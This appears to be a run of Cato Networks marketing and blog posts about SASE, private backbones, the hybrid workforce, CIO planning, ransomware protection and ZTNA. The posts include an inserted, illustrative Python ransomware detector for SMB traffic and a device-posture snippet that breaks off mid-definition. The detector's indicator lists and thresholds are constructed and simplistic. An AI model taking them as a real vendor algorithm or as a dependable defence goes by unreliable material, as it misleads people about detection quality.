We reduce the cost of enterprise-grade global connectivity by leveraging the massive build-out in IP capacity. All Cato PoPs are connected by SLA-backed transit capacity across multiple tier-1 networks. The Cato software monitors the underlying capacity, selecting the optimum path for every packet. The result: a network with far better performance than the public Internet at a far lower cost than global MPLS.
A Proven Solution for Global Connectivity
Cato’s backbone delivers better performance, availability, and coverage than any single carrier. A single tier-1 carrier can’t reach all parts of the globe, and a single tier-1 carrier can’t provide the predictability of MPLS. Just as enterprises use SD-WAN to aggregate Internet services and overcome the limitations of any one service, SASE leverages SD-WAN to aggregate tier-1 carriers to overcome the limitations of any one network.
“Opening new stores now goes smoothly, pricing is affordable, the cloud firewall and private backbone provide a great experience, and services are easy to set up.”
Steve Waibel, Director of IT, Brake Masters
“We no longer had to have a separate IDS/IPS, on-premises firewalls, or five different tools to report on each of those services. We could bring our cloud-based services directly into Cato’s backbone with our existing sites and treat them all the same.”
Joel Jacobson, Global WAN Manager, Vitesco Technologies
“The fast backbone connection most of the way to its ACD cloud service was a big plus. QOS was always a struggle before Cato. It’s pretty awesome to hit that Cato network and see that traffic prioritized all the way through to the cloud, rather than just close to our site.”
Bill Wiser, Vice President of IT, Focus Services
Thanks to the low cost of the Cato solution, Boyd CAT more than doubled branch bandwidth, by moving from 10 to 25 Mbits/s - to dramatically improve application performance together with Cato's optimization and global private backbone.
“The branches were just loving it. They started fighting over who would transition to Cato next. We were able to discontinue all our MPLS connections.”
Matt Bays, Communications Analyst, Boyd CAT
With Cato SASE, office and remote and home workers connect to the same high-speed backbone. Mobile and home users benefit from the same network optimizations and security inspections as office workers.
“This year, the entire WAN and Internet connectivity will be running on Cato.”
Eiichi Kobasako, Chief of Integrated Systems, Lion Corporation
Evaluating SASE Vendors? Here’s Why You Should Compare Apples and Oranges
There is a common cliché that is often thrown around during SASE vendor discussions: “you are comparing apples to oranges.” This phrase is typically used when looking at functions or features of a product, but often is used by people looking to discredit a solution offered by a competitor. It is natural, however, as every single vendor is inherently biased to believe that their offering is the best. So, let us take a look at what this expression means, and why we should compare apples and oranges when evaluating SASE solutions.
Why Compare Apples and Oranges
An apple and an orange have many things in common. They are both fruits, they are both round, they both can taste sweet (or sour), and both can do damage if they are thrown in anger. Based on these characteristics alone, there is no discernible difference between the two.
Now, what are the differences? The question you need to ask yourself is, “What do I want?” If you are looking to make an apple pie, then the choice is obvious. However, if your goal is to just eat something fruity, then that is where the deliberation begins. Do you buy an apple? Do you buy an orange? If you do not have an idea in mind, it is easy to get overwhelmed in the fruit aisle…
Mapping Architecture to Your End Goal
Look at the solutions and technologies that you use today within your corporate network and think about the purpose of their design. Have you purchased an orange or an apple, or do you have a chaotic digital fruit-salad which has grown organically over time due to a myriad of tastes and preferences? If so, you need to re-evaluate your entire corporate strategy to help you grow and develop into the future.
The architecture of every fruit has a purpose and has been designed in an optimal way to ensure continuity of its lineage. The orange has segments which may hold individual seeds, while grapes grow in a bunch connected by the stalks. This could be compared to a microservice architecture, such as Docker (packing containerized applications on a single node) or Kubernetes (running containerized applications across a cluster). Each fruit has its pros, cons, and uses; however, the more fruit you want, the more difficult your life becomes. You need to understand the architecture of each fruit, and then go on to identify the best practice for fruit combinations. You need to know the purpose and intent of each piece of fruit, and you need to locate a myriad of different fruits. This is manageable if there’s only one person purchasing and eating fruit for the company, but as soon as you add another personality – the situation evolves, in a negative way, and we haven’t even thought of the fruit bowl challenge.
The Fruit Bowl Challenge
Every time you purchase a piece of fruit, you need to store it somewhere. This could be in the fridge, in a bowl, in a cupboard, or left in your car under the scorching sun. To purchase each piece of fruit, you may need to go to different shops, with varying levels of quality. Should you purchase a Jazz Apple or a Braeburn, a Clementine or a Satsuma? Once you’ve identified which specific type of fruit you want, where can you get it at the right price? Shop A may offer it at a lower price than Shop B today, but that’s a limited time offer. When you’re trying to maximise a constrained budget, the time investment required to ensure you purchase something of quality and longevity can be a moderately significant effort.
Now, consider each piece of fruit is a component of your network. You want to purchase edge security, so you gather several vendors to check for bruises, blemishes, and pack-size. After making your decision on what to buy (after months of deliberation, RFPs, and proof-of-concepts), you then move to the negotiation stage with hundreds of distributors, resellers, or VARs. Finally, you close on the deal, and they send you a truck full of apples. It’s what you wanted right? I hope you have somewhere to store all those apples, because the clock is ticking, and they’re already starting to spoil.
Turning Apples into Apple Pie
So, you have your apples, you can see them, and you proudly gaze upon the mountain of fruit sat in your warehouse. You’ve spent a lot of money on these apples, and you’ve cashed in all your favours with your CFO to get the budget approved for this gargantuan upfront cost. Now the real work begins, as you need to prepare for the implementation, deployment, and creation of your apple pies (or firewall/site deployments, I’m sticking to the metaphor here!)
The first thing you do is hire a group of people to move the apples into neat piles. Then you hire another group of people to come and peel the apples, as well as a disposal company to remove the packaging/peel that you no longer need. Once fully peeled and sliced, you then need a way to transport the prepared goods to the next location for processing – all of this is required even before your apples touch pastry. However, you accounted for this during your initial budget spend, and do not see it as a concern, until you notice that some of the fruit has already turned rotten. You need to contact the vendor to initiate a return (RMA), and this is where you notice problems.
The Rotten Apple Problem
“Your support contract on this apple has expired.”
I personally used to work for an appliance (fruit) based company, and I had to tell customers this on an almost daily basis. People call Support for assistance as their sites may be down, or critical applications have been impacted by service outages and they need urgent P1 Support. However, if the customer had not actively maintained their Support contracts, then there is no legal obligation to help resolve their problem. In fact, if the vendor operates on a ‘Support & Maintenance per device’ basis, it’s in their interest to actively withhold assistance until you pay the money to reinstate the contract.
How many apples did you just buy? Did you take a Support contract out on every apple? Are you actively tracking the start and end-date of the renewal? Have you invested in administrative staff to ensure you have consistency of care? Will this vendor assist you with bruised apples, or does your contract only cover total losses? These are questions you should be asking yourself as you review the entire total cost of ownership for every single purchased asset. If you’ve amortized an apple over a 5-year period, do you think you’ll still be wanting the same apple 5 years from now? Your taste may have changed.
Oh, and did you remember, currently you haven’t just purchased apples for your company. Life isn’t that simple. You’ve also purchased your grapes, peaches, plums, pears, bananas and more, because you want to remain in complete control of your network using point products. How does it feel to have to constantly maintain this supply chain? Your life has become confusing, and this all started because somebody originally said that you were ‘comparing apples to oranges.’
The Cato Solution
We’ve been talking in metaphors during this article, but let’s drop the pretence and start talking directly. Today your network is most likely built from a series of different products made by a myriad of vendors. You have network firewalls, internet gateways, CASB engines, VPN concentrators, anti-malware engines, Intrusion Prevention Systems (IPS) and many more. Each of these products has been built by its vendor in the belief that it is the best in its own functional field. To you as a consumer, however, the result is a wide portfolio of products that you must learn (as well as maintain, update, and manage). Dealing with these administrative tasks is likely not the reason you decided to get into IT, but here you are. Life doesn’t have to be this way.
Cato Networks offers a truly converged service offering covering all aspects of Networking, Security and Access. The term ‘service offering’ is key, as we maintain, manage, and continually improve our service in the cloud, ensuring that you have the latest-and-greatest in networking and security coverage without having to lift a finger. Unlike product-based companies, you don’t have to have significant warehouse space to store hundreds of servers and appliances, you don’t need to worry about multitudes of service contracts, and best of all, you don’t need to worry about upgrading or patching (as this is done by Cato Networks.)
How to Solve the Fruit Bowl Challenge with Cato
So, in short, apples are great, and oranges are fine. But why limit yourself? What if I told you that you could have BOTH apples and oranges? What if I told you that you could get both using a single service subscription? What if I told you that we’re constantly growing our catalogue of SASE features and offerings, so you also get peaches, plums, pineapples, and pears at no extra cost? What if I told you that new fruit is being added every two weeks? Why limit yourself to just buying apples, when Cato can offer you every fruit under the sun, whenever you want it, all at the click of a button?
Solving Real-World Challenges – Your Pathway to SASE
We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges, and IT challenges are business challenges. As digitization continues to advance, these leaders continue to face an array of challenges, and the solutions they choose will determine their success or failure.
This article provides IT and security professionals with actionable ideas for selecting a robust platform for digital transformation to address the network and security challenges that adversely impact their business.
Real-world challenges in need of solutions
The Cato SASE Approach
Key questions to ask yourself when looking for a solution
Mapping Your Journey
Real-world Challenges Breed New Networking and Security Considerations
Global Business Expansion Creates New Connectivity Requirements
We are a global business society that is constantly expanding, whether organically into new markets or through mergers and acquisitions into new business lines. Whatever the impetus, there are real challenges these organizations will face. Adding new locations, for example, requires planning for global and local connectivity, which could be very inconsistent, depending upon the region.
In the case of mergers, we must deal with inconsistent or incompatible network architectures, while factoring in the unreliable nature of global connectivity over the public internet. And let’s not forget inconsistent security policies that add to your headaches.
And finally, we must consider how all this affects migrating new users and apps onto your core network, as well as ensuring access and security policies are correct. Not impossible, but this could take weeks or months to achieve.
All this results in unexpected consequences.
Rapid site deployment
Public Internet Transport
On-premise to Cloud Migration Spurs Capacity Constraints
Most obstacles in cloud adoption are related to basic performance aspects, such as availability, capacity, latency and scalability. Many organizations neglect to consider the bandwidth and capacity requirements of cloud applications. These applications should deliver performance similar to or better than their legacy on-premise counterparts. However, with the rush to adapt to the new Covid-normal, many are finding this is far from reality.
Scalability is also an issue with cloud deployments. As businesses continue to grow and expand, so does the need for a cloud network that scales at the speed of the business and doesn’t restrict it with technical limitations.
All together, these are real issues IT teams continue to face today, and until now, saw little to no relief in sight.
Capacity planning and cost management
Poor app performance
Expanding Cyber Threat Landscape
Every year, like clockwork, we witness numerous global companies attacked by cyber criminals at least once per day. Many have had sensitive data stolen and publicly leaked. The pandemic only exacerbated this, pushing more employees further from the enterprise security perimeter. The growth in Work-From-Anywhere (WFA) introduced more remote worker security challenges than many expected, and not many were truly prepared.
Additionally, as more organizations move their apps to the cloud, providing security for these apps, as well as safe use of 3rd party SaaS apps, became an even stickier point for today’s enterprises. This, along with securing remote workers, is pushing IT leaders to face the harsh reality of their current cyber defense shortcomings.
As these businesses attempt some form of return to normal, it’s clear we may never make it back to a traditional full-time office setup. WFA, as well as increased cloud usage, is here to stay, meaning the threats to the business will only increase. This means the potential costs of cyber breaches will follow suit.
Expanding cyber threat landscape
Securing Work-from-anywhere (WFA)
Improper employee usage
The Cato SASE Approach to Rapid Digital Transformation
It’s easy for most organizations to take a traditional approach to these challenges by looking for point solutions or creative chaining of technologies to create a bundled solution. While this provides an initial “feel-good” moment, this complex approach, invariably, creates more problems than it solves.
Cato addresses these challenges through simplicity, and accomplishes this through our converged, cloud-native approach. The Cato SASE (Secure Access Service Edge) Cloud converges core capabilities of networking, security and access management into a single software stack that delivers optimized cloud access, predictable performance, and unified policy management. Our SASE Cloud also provides complete visibility to inspect all traffic flows and provide advanced, holistic threat protection and consistent policy enforcement across a global private backbone.
Cato addresses the challenges of global connectivity with our global private backbone, providing resiliency and performance SLA guarantees. Our cloud acceleration and optimization address the performance challenges faced when migrating enterprise apps to a cloud data center. And we address the security challenges with advanced, holistic security tools like NGFW, SWG, NextGen Anti-Malware, IPS, CASB and DLP.
The Cato SASE Cloud enables enterprises to more rapidly and securely deliver new products and services to market, and more quickly respond to changes in business and technology dynamics that impact their competitiveness.
What is SASE and its Core Requirements?
When deciding on SASE solutions, it is helpful to understand the core requirements as specified by Gartner and compare the various vendors in the market. For SASE to deliver on the promise of infrastructure simplicity, end-to-end optimization and limitless scalability, it must adhere to certain requirements: Converged, Cloud-native, Global, All Edges and Unified Management.
Converged – A single software stack that combines network, security, and access management as one. This eliminates multiple layers of complexity. There is no need to stitch together bundles of disparate technologies. No need for multiple configuration tools to configure these different technologies. Convergence leads to simpler architecture, easier management, and lower overall costs to the business.
Cloud-Native – Built in the cloud for the cloud. Unlike appliances and virtualized solutions based upon appliances, being cloud-native enables the vendor to deliver more flexibility in deployment and to scale more easily and quickly when customers require more capacity.
Global – Having a global presence means a network of PoPs everywhere, connected via a global private backbone. This means the network is everywhere the customer business is, delivering guaranteed performance and optimization for all traffic, consistent policy enforcement globally, and network resilience to keep the business running.
All Edges – Consistently and seamlessly delivering services to all edges (branch, endpoint, data center, cloud) without complex configuration or integration.
Unified – A single, unified management console to provision and manage all services. No need to build dashboards to communicate with multiple technologies to manage the deployment.
These are non-negotiable requirements that only a true Cloud-Native SASE solution can deliver. Appendix A highlights how the Cato SASE Cloud compares to appliance-based solutions.
7 Questions You Must Ask Before Selecting Your Next Solution
To solve these issues, here are some key questions to ask yourself and your team. This will help you find the right solution to alleviate these challenges.
1. What real problems are we trying to solve?
Identify what technical challenges are inhibiting you from delivering the best app, networking, and security experience for the business. Discover which projects are on hold because your infrastructure can’t accommodate them. The answers will provide you with insights into the actual problems you need to solve.
2. Which solution solves this, while scaling at the speed of our business?
The natural response when encountering point-problems, is to find a point-solution. When doing so, ask yourself which solution delivers a more holistic approach to all your concerns (from question 1) while also providing a platform that scales at the speed of your business.
3. How can we ensure cost-effective, business continuity?
Business continuity is non-negotiable, so when searching for a solution, ensure you find one that provides a resilient architecture that keeps your business running, no matter what happens.
4. With limited resources, how fast can we deploy new sites?
Your solution shouldn’t just look good on paper, it needs to work well in practice. You can’t wait two, three or six months to launch new branches. Find a solution that enables rapid, zero-touch deployment, with minimal impact on your teams.
5. How can we build and maintain a consistent policy structure?
Multiple configuration tools can create policy mismatches, which in turn creates gaps and puts your critical applications at risk. To reduce this risk, find a solution that addresses configuration inconsistencies.
6. What’s the right amount of security?
Security is an imperative, so most businesses try to implement multiple solutions with lots of cool-sounding features to make themselves feel secure. Unfortunately, multiple point solutions create security blind spots. Additionally, about 80%-90% of “cool” security features are never used. Achieve more with less by finding a solution that improves your security posture, independent from the size of your corporation or the size of your IT team.
7. What’s our best option for global connectivity?
Connectivity can make or break your business. Find a solution that provides increased capacity, guaranteed performance, and a global private backbone. Don’t settle for less.
Mapping Your SASE Journey in 4 Easy Steps
Now that you understand the networking and security challenges adversely affecting your business and their proposed solutions, it’s time to map out your SASE journey. Doing this can be easier than you might think.
After you’ve answered the above questions, it’s now time to prioritize and create your migration plan. You may have one problem to solve, and in this case it’s easy. But most will have several, so once determined and prioritized, it’s time to plan and put it into action. Of course, Cato and our partners can assist, and even recommend a migration plan.
2. Solve the problem:
This is wholly up to the organization. Some may prefer to tackle low-hanging fruit projects to build confidence in the teams. In this case, easy problems may go first. But others believe in “Go Big or Go Home”, so they may start with the most critical problems first. It’s basically up to the organization to define.
Observe the “wow” moments of that problem being solved. Whether performance, enhanced security, global connectivity, and so on – observe and enjoy. Then move onto the next problem or project.
4. Repeat and observe.
It’s a straight-forward journey, and a well-defined plan makes it all flow smoothly.
Does Your Solution Allow You to Plan for the Future?
Solving problems the legacy way is how we acquired the complexity beast we have today. So, it’s time we change the game and become more strategic about addressing our IT challenges.
The Cato SASE Cloud does this by converging all the capabilities organizations need today into a single platform, while future-proofing their businesses for whatever is next. In contrast, a non-SASE approach forces you to spend time and resources evaluating, acquiring, and integrating multiple technologies to address each requirement.
Taking a platform approach to your transformation journey will address the challenges of today and prepare you for the opportunities of tomorrow. Taking a Cato SASE approach will enable your network to scale at the speed of your business.
Appendix A – SASE Core Requirements Comparison Chart
Gartner SASE Requirement: Converged
Cato: Yes. One single software stack with the network and security as one.
Appliance Solutions: No. A mixed collection of appliances that are stitched together.
Cato SASE Advantage for Customers: Network and security simplicity and uniformity in policy enforcement can only be achieved through convergence.

Gartner SASE Requirement: Cloud-Native
Cato: Yes. Built as a distributed cloud-native service from scratch, with no appliance baggage.
Appliance Solutions: No. Use virtualized hardware placed in the cloud.
Cato SASE Advantage for Customers: Easy and inexpensive to scale when increased capacity is required. Customers can scale and grow at the speed of their business, and not be limited by the complexity of a stale network.

Gartner SASE Requirement: Global
Cato: Yes. 75+ PoPs available located near every major business center. Each has an independent expansion plan.
Appliance Solutions: Limited. Relying on IaaS for hosting PoPs limits availability and degrades performance. Growth depends on IaaS plans, not the SASE vendor's.
Cato SASE Advantage for Customers: Cato’s global private backbone delivers performance guarantees, resiliency and policy consistency between sites across the WAN and cloud.

Gartner SASE Requirement: All Edges
Cato: Yes. Designed with light edge connectors (SD-WAN, SDP, Cloud) with a cloud first architecture to deliver same service to all edges.
Appliance Solutions: Limited. Delivering services to different edges requires a different portfolio solution. So, this is only achieved by stitching together portfolio products.
Cato SASE Advantage for Customers: Connecting and servicing all edges (branch, endpoint, data center, cloud) does not require complex configuration or integration.

Gartner SASE Requirement: Management
Cato: Unified. One console to control all SD-WAN, security, remote access, and networking policies with full analytics and visibility. Self-service or managed service.
Appliance Solutions: No. Multiple configuration interfaces to navigate.
Cato SASE Advantage for Customers: A single policy management app eliminates configuration gaps by ensuring consistent policy configurations & enforcement across the entire network.
About Cato Networks
Cato is the world's first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever's next.
For any questions about the ideas suggested in this article, and if you have some more of your own, feel free to contact us at: catonetworks.com/contact-us/
Cato’s Ransomware Lab Births Network-based Ransomware Prevention
As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation.
Of course, this isn’t our first foray into malware protection. Cato has a rich multilayered malware mitigation strategy of disrupting attacks across the MITRE ATT&CK framework. Cato’s antimalware engine prevents the distribution of malware in general. Cato IPS detects anomalous behaviors used throughout the cyber kill chain. Cato also uses IPS and AM to detect and prevent MITRE techniques used by common ransomware groups, which spot the attack before the impact phase. And, as part of this strategy, Cato security researchers follow the techniques used by ransomware groups, updating Cato’s defenses, and protecting enterprises against exploitation of known vulnerabilities in record time.
What’s being introduced today are heuristic algorithms specifically designed to detect and interrupt ransomware. The machine-learning heuristic algorithms inspect live SMB traffic flows for a combination of network attributes including:
File properties such as specific file names, file extensions, creation dates, and modification dates,
Shared volumes access data such as metrics on users accessing remote folders,
Network behavior such as creating certain files and moving across the network in particular ways, and
Time intervals such as encrypting whole directories in seconds.
Once found, Cato automatically blocks SMB traffic from the source device, preventing lateral movement or file encryption, and notifies the customer.
The work comes out of our ransomware lab project that we started several months ago. The lab uses a standalone network within Cato where we reproduce ransomware infections in real-life organizations. “We execute them in the lab to understand how they do their encryptions, what file properties they change, and other parts of their operations and then we figure out how to optimize our heuristics to detect and prevent them,” says Tal Darsan, manager of managed security services at Cato. So far, the team has dug into more than a dozen ransomware families, including Black Basta, Conti, and Avos Locker.
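The combination of attributes listed above (file names and extensions, activity across shared folders, creation of certain files, and bursts measured in seconds) can be expressed as a sliding-window scorer over SMB file events. This is an added example, not Cato's algorithm or code; the event format, extension and note-name lists, thresholds, hosts and paths are constructed assumptions.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumed indicator lists and thresholds (hypothetical values for this example).
SUSPECT_EXTENSIONS = {".locked", ".encrypted"}
NOTE_NAMES = {"readme_restore.txt", "how_to_decrypt.txt"}
WINDOW_SECONDS = 10   # time interval: what one source did in the last 10 s
RENAME_BURST = 8      # file properties: renames to a suspect extension in the window
DIR_SPREAD = 2        # shared-volume access: distinct folders hit by those renames
BLOCK_SCORE = 2       # how many independent signals must agree before blocking


@dataclass(frozen=True)
class SmbEvent:
    ts: float           # seconds since capture start
    src: str            # source device issuing the SMB request
    user: str
    op: str             # "create", "write" or "rename"
    path: str           # UNC path of the target file
    new_path: str = ""  # destination name, rename only


def signals_for(window):
    """Return the heuristic signals present in one source's current time window."""
    sigs = set()
    renames = [e for e in window if e.op == "rename"
               and PureWindowsPath(e.new_path).suffix.lower() in SUSPECT_EXTENSIONS]
    if len(renames) >= RENAME_BURST:
        sigs.add("extension_burst")
    folders = {str(PureWindowsPath(e.path).parent).lower() for e in renames}
    if len(folders) >= DIR_SPREAD:
        sigs.add("multi_directory")
    if any(e.op == "create" and PureWindowsPath(e.path).name.lower() in NOTE_NAMES
           for e in window):
        sigs.add("note_dropped")
    return sigs


def detect(events):
    """Slide a per-source window over the events; return {src: (block_ts, signals)}."""
    windows = defaultdict(deque)
    blocked = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.src in blocked:
            continue  # SMB from this source is already cut off
        win = windows[ev.src]
        win.append(ev)
        while ev.ts - win[0].ts > WINDOW_SECONDS:
            win.popleft()
        sigs = signals_for(win)
        if len(sigs) >= BLOCK_SCORE:
            blocked[ev.src] = (ev.ts, sigs)
    return blocked


def sample_events():
    """Constructed traffic: two benign sources and one ransomware-like source."""
    share = PureWindowsPath(r"\\fs01\finance")
    evs = []
    for i in range(10):  # a user saving documents over several minutes
        evs.append(SmbEvent(i * 30.0, "10.0.0.21", "alice", "write",
                            str(share / "q1" / f"report{i}.xlsx")))
    for i in range(20):  # an admin script rotating logs quickly, harmless suffix
        p = str(share / ("q1" if i % 2 else "q2") / f"app{i}.log")
        evs.append(SmbEvent(50 + i * 0.125, "10.0.0.50", "svc", "rename", p, p + ".old"))
    for i in range(12):  # mass rename to a suspect extension across two folders
        p = str(share / ("q1" if i % 2 else "q2") / f"ledger{i}.xlsx")
        evs.append(SmbEvent(100 + i * 0.25, "10.0.0.37", "bob", "rename", p, p + ".locked"))
    evs.append(SmbEvent(101.0, "10.0.0.37", "bob", "create",
                        str(share / "q1" / "README_RESTORE.txt")))
    return evs


if __name__ == "__main__":
    for src, (ts, sigs) in detect(sample_events()).items():
        print(f"block SMB from {src} at t={ts}s, signals={sorted(sigs)}")
```

Requiring two signals to agree keeps the fast but harmless log rotation from the service account unblocked, while the infected source is cut off one second into its burst.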
How to Gradually Deploy SASE in an Enterprise
For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge) was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified, cloud-delivered service. Gartner predicts that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”
SASE converges networking and security into a single architecture that is:
And covers all edges
Enterprises can deploy SASE at the flip of a switch or gradually. In this blog post, we list five different gradual deployment use cases that enterprise IT can incorporate. For more detailed explanations, you can read the in-depth ebook that this blog post is based on, “SASE as a Gradual Deployment”.
Use Case #1: MPLS Migration to SD-WAN
SASE can support running MPLS alongside SD-WAN. In this first use case, enterprises leverage SASE’s SD-WAN functionalities, while turning off MPLS sites at their own schedule. Existing security and remote access solutions remain in place.
Use Case #2: Optimize Global Connectivity
SASE improves performance across global sites and WAN applications. Enterprises can use SASE for global connectivity and keep MPLS connections for critical WAN applications.
Use Case #3: Secure Branch Internet Access
SASE eliminates the need for edge security devices by including new technologies instead, for example NGFW, IPS, ZTNA, and more. In this use case, MPLS is augmented with SASE security.
Use Case #4: Cloud Acceleration and Control
SASE’s global network of PoPs (Points of Presence) optimizes traffic in the network and to cloud data centers. Enterprises can leverage SASE instead of relying on the erratic Internet.
Use Case #5: Remote Access
SASE optimizes and secures remote traffic. By replacing VPNs with SASE, enterprises can ensure remote access to all edges through a secure network of global PoPs.
Introducing Cato: The World’s First SASE Service
Cato is the world’s first SASE platform, which supports gradual migration while connecting all network resources, including branches, mobile, remote employees, data centers, and more. Through a global and secure cloud-native network, Cato also offers:
Managed threat detection and response
Intelligent last-mile management
So much more
To learn more about MPLS to SASE deployment, read the ebook "SASE as a Gradual Deployment".
Your Post COVID Guide: Strategically Planning for the Hybrid Workforce
Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality.
For IT teams, this abrupt change was unexpected. As a result, organizations did not have the infrastructure in place required to support remote users. At first, IT teams tried to deal with the new situation by stacking up legacy VPN servers. But these appliances did not meet agility, security and scalability demands.
Now, organizations need to find a different strategic solution to enable a productive hybrid workforce that can adapt to future changes. In this blog post, we cover the three main requirements of such a strategic solution and our technological recommendations for answering them.
(For a more in-depth analysis, you can read the ebook “The Hybrid Workforce: Planning for the New Working Reality”, which this blog post is based on.)
Requirement #1: Seamless Transition Between Home and Office
Most traditional infrastructure, namely MPLS, SD-WAN and NGFW/UTM, is focused on the office. However, there is no infrastructure that extends to remote work and home environments. This extension is required to enable a remote workforce.
Solution #1: ZTNA and SASE
ZTNA (Zero Trust Network Access) and SASE (Secure Access Service Edge) decouple network and security capabilities from physical appliances. Instead, they provide them in the cloud. This solution converges all infrastructure into a single platform that is available to everyone, everywhere.
Requirement #2: Scalable and Globally Distributed Remote Access
Today’s VPNs are appliance-centric, making them resource-intensive when scaling and maintaining them.
Solution #2: Remote Access as a Service
A global cloud service can provide remote access to a significant user base. This will free up IT resources for infrastructure management.
Requirement #3: Optimization and Security for All Traffic
Having remote access is not enough. Teams also need traffic optimization and security for performance and preventing breaches.
Solution #3: A Single Solution for All Needs
Some remote access solutions include optimization and security for all traffic types. This can be done through WAN optimization, cloud acceleration and threat prevention.
A global and agile network and security infrastructure can serve your hybrid workforce and help you prepare for whatever is next. Read the ebook to learn how.
How to Succeed as a CIO in 100 Days
A CIO position is exciting but also challenging, especially if it’s your first role... And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use it to achieve professional success and establish your position as an invaluable business leader. (And, for more in-depth explanations, tips and stats, check out the e-book this blog post is based on.)
Phase 1: Get to Know the Organization and the Team (3 weeks)
The first step at a new company is to get to know the people and learn the company culture. Spend time with your team, stakeholders and company leadership. Use this opportunity to learn about the business, IT’s contribution and where IT fits in the business’s future goals. During these talks, map out any potential gaps or weaknesses you can identify.
To see example questions to ask during these sessions, check out the eBook.
Phase 2: Learn the IT and Security Infrastructure (3 weeks)
Once you’ve understood the expectations from your department, it’s time to learn the network infrastructure and architecture.
Take scope of:
Technologies in use
The delivery model
On-site and off-site work
Digital transformation status
Similar to phase one, start mapping out any network strengths and weaknesses.
Phase 3: Set a Strategy and Goals (2 weeks)
Finally, now is the time to determine your strategy for the upcoming year.
Organize your notes from phases 1 and 2.
Research new technologies, tools, trends and capabilities that could be relevant to your industry and requirements.
Map out your department’s strengths, weaknesses, threats and opportunities.
Determine your vision and mission statement.
Define your objectives.
Phase 4: Incorporate Digital Transformation (2 weeks)
According to McKinsey Global, following Covid-19, companies are accelerating digitization by three to seven years, acting even 40 times faster than expected! This means that CIOs who want to be perceived as future leaders need to keep up to date with digital technologies.
Look beyond traditional architectures and into trends like cloudification, convergence and mobility. According to Lars Norling, Director of IT Operations from ADB Safegate, “Our analysis clearly showed the shift in the IT landscape, namely extended mobility and the move towards providing core services as cloud services. This led us to look outside of the box, beyond traditional WAN architectures.”
Gartner identifies SASE (Secure Access Service Edge) as the leading transformative technology today. SASE converges network and security into one global cloud service while reducing IT overhead, ensuring speed and performance and incorporating the latest security solutions.
Phase 5: Set Priorities (2 weeks)
Are you excited to get started on executing your plan? It’s almost time to do so. But first, prioritize the activities you want to take on, based on business requirements, ROI, urgency and risks.
The steps above are intended to help you make days 101 and onwards a smashing success. So go over your plans, take a deep breath and get started. Good luck!
To learn more about digital transformation and SASE, let’s talk.
Read more about your first 100 days in the ebook, “Your First 100 Days as CIO: 5 Steps to Success”.
ZTNA Alone is Not Enough to Secure the Enterprise Network
ZTNA is a Good Start for Security
Zero trust has become the new buzzword in cybersecurity, and for good reason. Traditional, perimeter-focused security models leave the organization vulnerable to attack and are ill-suited to the modern distributed enterprise. Zero trust, which retracts the “perimeter” to a single asset, provides better security and access management for corporate IT resources regardless of their deployment location.
In many cases, zero trust network access (ZTNA) is an organization’s first step on its zero trust journey. ZTNA replaces virtual private networks (VPNs), which provide a legitimate user with unrestricted access to the enterprise network.
In contrast, ZTNA makes case-by-case access determinations based on access controls. If a user has legitimate access to a particular resource, then they are given access to that resource for the duration of the current session. However, accessing any other resources or accessing the same resource as part of a new session requires re-verification of the user’s access.
The shift from unrestricted access to case-by-case access on a limited basis provides an important first step towards implementing an effective zero trust security strategy.
Adopting ZTNA Alone Is Not Enough
The purpose of ZTNA is to prevent illegitimate access to an organization’s IT resources. If a legitimate user account attempts to access a resource for which they lack the proper permissions, then that access request is denied.
This assumes that all threats originate from outside the organization or from users attempting to access resources for which they are not authorized. However, several scenarios exist in which limiting access to authorized accounts does not prevent attacks.
Compromised or Malicious Accounts
ZTNA limits access to corporate resources to accounts that have a legitimate need for that access. However, an account with legitimate access can be abused to perform an attack.
One of the most common cyberattacks is credential stuffing, in which an attacker tries to use an individual’s compromised credentials for one account to log into another account. If successful, the attacker has access to an account with legitimate access whose requests may be accepted by a ZTNA solution. If this is the case, then an attacker can use this compromised account to steal sensitive data, plant malware, or perform other malicious actions.
Additionally, not all threats originate from outside of the organization. An employee could cause a data breach either via negligence or intentionally. For example, 29% of employees admit to taking company data with them when leaving a job. Legitimate users could also accidentally deploy malware on the corporate network. In 2021, 80% of ransomware was self-installed, meaning that the user opened or executed a malicious file that installed the malware. If this occurred on the corporate network, it would be within the context of a legitimate user account.
Users access corporate resources via computers or mobile devices. While a ZTNA solution may be configured to look for a combination of a user account and a known device, this device may not be trustworthy.
Devices infected with malware may attempt to take advantage of a user’s account and assigned permissions to gain access to the corporate network or other resources. If malware is installed on a user’s device, it may spread to the corporate network via legitimate accounts.
ZTNA’s access control policies alone are not enough to protect against infected devices. Solutions also need to include device posture monitoring to provide more information about the risk posed by a particular device. Common device posture monitoring features include identifying the security tools running on the device, the current patch level, and compliance with corporate security policies. Ideally, a ZTNA solution should provide the ability to tune device posture access requirements based on the requested resources and to incorporate other valuable information, such as the device OS and location.
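The sketch below illustrates the point about tuning device posture requirements per resource: the same entitled account is allowed or denied depending on the device it arrives from and on what it asks for. It is an added example, not code from any ZTNA product; the class names, posture fields, resource names and thresholds are all assumptions chosen for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class DevicePosture:
    os: str
    patch_age_days: int          # days since the last OS security update
    security_tools: frozenset    # security agents currently running
    policy_compliant: bool       # e.g. disk encryption and screen lock enforced
    country: str


@dataclass(frozen=True)
class ResourcePolicy:
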